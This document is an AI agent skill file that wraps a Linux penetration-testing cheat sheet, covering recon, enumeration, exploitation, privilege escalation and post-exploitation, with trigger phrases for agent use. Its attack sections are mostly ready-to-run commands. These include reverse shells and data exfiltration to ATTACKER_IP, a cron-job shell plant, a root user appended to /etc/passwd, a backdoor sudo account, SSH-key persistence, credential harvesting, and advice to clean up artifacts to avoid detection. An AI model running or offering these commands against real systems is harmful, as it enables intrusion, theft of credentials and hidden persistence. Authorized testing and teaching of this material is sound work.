Practical Linux command reference for penetration testing including recon, enumeration, exploitation, privilege escalation, and post-exploitation techniques.
---
name: linux-pentesting-command-reference
description: Practical Linux command reference for penetration testing covering reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation phases.
triggers:
- how do I enumerate services on a linux target
- show me privilege escalation commands for pentesting
- what reconnaissance commands should I use on linux
- help me with linux exploitation techniques
- what are common post-exploitation commands
- show me pentesting enumeration commands for linux
- how to perform local recon on a compromised linux system
- what commands help with linux privilege escalation
---
# Linux Pentesting Command Reference
> Skill by [ara.so](https://ara.so) — Security Skills collection.
## Overview
The **Linux for a Pentester** project is a curated collection of practical Linux commands and techniques organized by penetration testing phases. This reference is built from real-world labs, CTFs, and hands-on practice, focusing on actionable commands rather than theory. It covers the complete pentesting workflow from initial reconnaissance through post-exploitation.
## Repository Structure
The notes are organized into six main modules:
- **00-General-Commands**: Essential Linux survival commands for daily usage
- **01-Recon**: Local and network reconnaissance techniques
- **02-Enumeration**: Deep service and user data enumeration
- **03-Exploitation**: Shell access, file uploads, and initial foothold techniques
- **04-Privilege-Escalation**: Techniques for escalating to root privileges
- **05-Post-Exploitation**: Persistence, cleanup, and lateral movement
- **Cheatsheets**: Quick reference one-liners
## Installation
Clone the repository to have offline access during engagements:
```bash
git clone https://github.com/HIMANSHUSHARMA20/Linux-for-a-Pentester.git
cd Linux-for-a-Pentester
```
For quick reference during testing:
```bash
# View specific module
cat 04-Privilege-Escalation/README.md
# Search for specific commands
grep -r "sudo" .
# Find all references to a specific tool
find . -type f -name "*.md" -exec grep -l "nmap" {} \;
```
## Key Command Categories
### General Commands (Module 00)
Essential commands for navigation and system interaction:
```bash
# File system navigation
ls -la # List all files including hidden
cd /path/to/directory # Change directory
pwd # Print working directory
find / -name "*.conf" 2>/dev/null # Find config files, suppress errors
# File operations
cat /etc/passwd # View file contents
less /var/log/syslog # Page through large files
grep -r "password" . # Recursive search
tail -f /var/log/auth.log # Follow log file in real-time
# System information
uname -a # Kernel and system info
whoami # Current user
id # User and group IDs
hostname # System hostname
```
### Reconnaissance (Module 01)
Local and network reconnaissance commands:
```bash
# Network enumeration
ip a # Show network interfaces
ss -tulpn # Show listening ports (modern netstat)
netstat -ano # Show all network connections
arp -a # Show ARP cache
# System enumeration
ps aux # List all running processes
systemctl list-units # List systemd services
cat /etc/issue # OS version info
cat /etc/*-release # Distribution info
lsb_release -a # Detailed OS info
# User enumeration
cat /etc/passwd # List all users
cat /etc/group # List all groups
w # Who is logged in
last # Last logged in users
lastlog # All users last login
```
### Enumeration (Module 02)
Deep service and data enumeration:
```bash
# File system enumeration
find / -perm -4000 2>/dev/null # Find SUID binaries
find / -writable -type d 2>/dev/null # Find writable directories
find / -name "*.conf" -o -name "*.config" 2>/dev/null # Find configs
# Capability enumeration
getcap -r / 2>/dev/null # Find files with capabilities
# Cron job enumeration
cat /etc/crontab
ls -la /etc/cron.*
crontab -l # Current user's crontab
# Service enumeration
systemctl list-unit-files --state=enabled
ps aux | grep -i "root" # Root processes
# Database files
locate password | grep -i config
find / -name "*.db" 2>/dev/null
find / -name "*.sqlite" 2>/dev/null
```
### Exploitation (Module 03)
Common exploitation techniques and payloads:
```bash
# Reverse shells
bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1
nc ATTACKER_IP PORT -e /bin/bash
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# TTY shell upgrade
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
# Then: Ctrl+Z, stty raw -echo; fg, export TERM=xterm
# File transfer
# On attacker: python3 -m http.server 8000
wget http://ATTACKER_IP:8000/file -O /tmp/file
curl http://ATTACKER_IP:8000/file -o /tmp/file
# Data exfiltration
cat /etc/passwd | nc ATTACKER_IP PORT
curl -X POST -d @/etc/passwd http://ATTACKER_IP:PORT/
```
### Privilege Escalation (Module 04)
Techniques for escalating privileges:
```bash
# SUID exploitation
find / -perm -4000 -type f 2>/dev/null
# Check GTFOBins for SUID binary exploits
# Sudo exploitation
sudo -l # List sudo privileges
sudo -l -U username # Check other user's sudo rights
# Writable /etc/passwd exploitation
openssl passwd -1 -salt salt password123
echo 'newroot:HASH:0:0:root:/root:/bin/bash' >> /etc/passwd
# Cron job abuse
# Write malicious script to writable cron job path
echo 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1' > /path/to/cronjob.sh
chmod +x /path/to/cronjob.sh
# PATH hijacking
echo '/bin/bash' > /tmp/vulnerable_binary
chmod +x /tmp/vulnerable_binary
export PATH=/tmp:$PATH
# Kernel exploits (check kernel version first)
uname -a
# Search for kernel exploits on exploit-db or searchsploit
searchsploit linux kernel 4.15
# Capabilities abuse
# If python has cap_setuid+ep
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
```
### Post-Exploitation (Module 05)
Persistence and lateral movement:
```bash
# Add SSH key for persistence
mkdir -p /root/.ssh
echo "YOUR_PUBLIC_KEY" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
# Add backdoor user
useradd -m -s /bin/bash backdoor
echo "backdoor:password" | chpasswd
usermod -aG sudo backdoor
# Download enumeration scripts
wget http://ATTACKER_IP/linpeas.sh -O /tmp/linpeas.sh
chmod +x /tmp/linpeas.sh
./tmp/linpeas.sh
# Credential harvesting
grep -r "password" /home/ 2>/dev/null
cat ~/.bash_history
cat ~/.mysql_history
find / -name "*.conf" -exec grep -i "pass" {} \; 2>/dev/null
# Lateral movement preparation
hostname -I # Get all IPs
for i in {1..254}; do ping -c 1 192.168.1.$i & done # Ping sweep
```
## Common Patterns
### Initial Access Workflow
```bash
# 1. Stabilize shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# Ctrl+Z
stty raw -echo; fg
# 2. Basic enumeration
id && hostname && uname -a
cat /etc/passwd | grep -v nologin
sudo -l
# 3. Transfer enumeration script
wget http://ATTACKER_IP:8000/linpeas.sh -O /tmp/lp.sh && chmod +x /tmp/lp.sh
```
### Privilege Escalation Checklist
```bash
# Check sudo
sudo -l
# Check SUID
find / -perm -4000 -type f 2>/dev/null
# Check capabilities
getcap -r / 2>/dev/null
# Check cron jobs
cat /etc/crontab
ls -la /etc/cron.*
# Check writable paths
find / -writable -type d 2>/dev/null | grep -v proc
# Check for credentials
grep -r "password" /home/ 2>/dev/null
find / -name "*.conf" -type f -exec grep -i "pass" {} + 2>/dev/null
```
## Troubleshooting
### Shell Issues
**Problem**: Unstable or non-interactive shell
```bash
# Try multiple TTY upgrade methods
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
perl -e 'exec "/bin/bash";'
script -qc /bin/bash /dev/null
```
**Problem**: Commands not working in reverse shell
```bash
# Set proper PATH
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export SHELL=/bin/bash
export TERM=xterm-256color
```
### File Transfer Issues
**Problem**: wget/curl not available
```bash
# Try alternative methods
# Using netcat
nc ATTACKER_IP PORT < file # Send
nc -lvp PORT > file # Receive
# Using base64
base64 file | nc ATTACKER_IP PORT # Send
nc -lvp PORT | base64 -d > file # Receive
# Using scp (if SSH available)
scp file user@ATTACKER_IP:/path/
```
### Permission Issues
**Problem**: Cannot write to common directories
```bash
# Find writable locations
find / -writable -type d 2>/dev/null | grep -v proc
# Common writable: /tmp, /var/tmp, /dev/shm
# Check /tmp alternatives
ls -la /dev/shm
ls -la /var/tmp
```
### Enumeration Script Failures
**Problem**: Automated scripts not running
```bash
# Check script requirements
file linpeas.sh # Verify file type
head -1 linpeas.sh # Check shebang
which bash # Verify interpreter exists
# Run with explicit interpreter
bash linpeas.sh
sh linpeas.sh
```
## Integration with AI Agents
When assisting with pentesting tasks, reference specific modules:
```bash
# For recon phase
cat Linux-for-a-Pentester/01-Recon/network-enumeration.md
# For privilege escalation
grep -r "sudo" Linux-for-a-Pentester/04-Privilege-Escalation/
# For specific techniques
find Linux-for-a-Pentester -name "*suid*"
```
## Best Practices
1. **Always stabilize your shell first** before running complex commands
2. **Use 2>/dev/null** to suppress error messages in enumeration commands
3. **Check sudo -l** as the first privilege escalation check
4. **Transfer and run automated enumeration scripts** (LinPEAS, LinEnum) for comprehensive coverage
5. **Document discovered credentials** and file paths for later reference
6. **Clean up artifacts** during post-exploitation to avoid detection
## Legal Disclaimer
These commands and techniques are for **authorized penetration testing and educational purposes only**. Always ensure you have explicit written permission before testing any system you do not own.
Creator's repository · aradotso/security-skills